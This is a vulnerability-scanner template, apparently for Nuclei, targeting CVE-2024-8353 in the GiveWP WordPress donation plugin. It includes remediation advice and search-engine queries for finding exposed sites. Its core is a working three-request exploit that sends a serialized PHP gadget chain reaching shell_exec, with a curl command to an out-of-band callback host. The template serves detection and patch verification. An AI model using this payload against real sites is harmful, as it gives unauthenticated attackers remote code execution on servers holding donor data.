id: CVE-2024-8353

info:
  name: GiveWP Donation Plugin <= 3.16.1 - Unauthenticated PHP Object Injection
  author: hnd3884
  severity: critical
  description: |
    The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.1. This is due to insufficient input validation on user-supplied data. An unauthenticated attacker can inject a serialized PHP object, which may allow them to execute arbitrary PHP code, depending on the presence of a suitable POP chain on the target system. This vulnerability could lead to full site compromise.
  impact: |
    Unauthenticated attackers can inject serialized PHP objects to execute arbitrary PHP code through POP chains, potentially achieving full site compromise, complete server control, and access to all WordPress data.
  remediation: |
    Update GiveWP plugin to version 3.16.2 or later to address the PHP object injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8353
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give/givewp-donation-plugin-and-fundraising-platform-3161-unauthenticated-php-object-injection
    - https://plugins.trac.wordpress.org/browser/give/trunk/readme.txt
    - https://plugins.trac.wordpress.org/browser/give/tags/3.16.0/includes/process-donation.php#L154
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-8353
    cwe-id: CWE-502
    epss-score: 0.91641
    epss-percentile: 0.99692
    cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    vendor: givewp
    product: givewp
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/give/"
    fofa-query: body="/wp-content/plugins/give/"
    publicwww-query: "/wp-content/plugins/give/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,givewp,rce,unauth,vkev,vuln

variables:
  cmd: "curl+http://test.{{interactsh-url}}"
  length: "{{len(cmd)}}"
  cred: "{{rand_text_alpha(8)}}"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=give_form_search

    extractors:
      - type: json
        name: id
        json:
          - ".[0].id"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=give_donation_form_nonce&give_form_id={{id}}

    extractors:
      - type: json
        name: nonce
        json:
          - ".data"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        give-form-id={{id}}&give-form-hash={{nonce}}&give-price-id=0&give-amount=10&give_first={{cred}}&give_last={{cred}}&give_email={{cred}}%40example.org&give_title=%5CO%3A19%3A%22Stripe%5C%5C%5C%5CStripeObject%22%3A1%3A%7Bs%3A10%3A%22%5C0%2A%5C0_values%22%3Ba%3A1%3A%7Bs%3A3%3A%22foo%22%3BO%3A62%3A%22Give%5C%5C%5C%5CPaymentGateways%5C%5C%5C%5CDataTransferObjects%5C%5C%5C%5CGiveInsertPaymentData%22%3A1%3A%7Bs%3A8%3A%22userInfo%22%3Ba%3A1%3A%7Bs%3A7%3A%22address%22%3BO%3A4%3A%22Give%22%3A1%3A%7Bs%3A12%3A%22%5C0%2A%5C0container%22%3BO%3A33%3A%22Give%5C%5C%5C%5CVendors%5C%5C%5C%5CFaker%5C%5C%5C%5CValidGenerator%22%3A3%3A%7Bs%3A12%3A%22%5C0%2A%5C0validator%22%3Bs%3A10%3A%22shell_exec%22%3Bs%3A12%3A%22%5C0%2A%5C0generator%22%3BO%3A34%3A%22Give%5C%5C%5C%5COnboarding%5C%5C%5C%5CSettingsRepository%22%3A1%3A%7Bs%3A11%3A%22%5C0%2A%5C0settings%22%3Ba%3A1%3A%7Bs%3A8%3A%22address1%22%3Bs%3A{{length}}%3A%22{{cmd}}%22%3B%7D%7Ds%3A13%3A%22%5C0%2A%5C0maxRetries%22%3Bi%3A10%3B%7D%7D%7D%7D%7D%7D&give-gateway=offline&action=give_process_donation

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains(content_type, "text/html")
          - status_code == 500
        condition: and
# digest: 4a0a0047304502210096b8f4dbca236ba4885bce382e641cdf224d89dd0ec9089bc293f39f8d97341002201f06f5cbfdb3ba0a7e0bbfa97370b1ccd122b10bdfaa7bbddcf503b7b8b55669:922c64590222798bb761d5b6d8e72950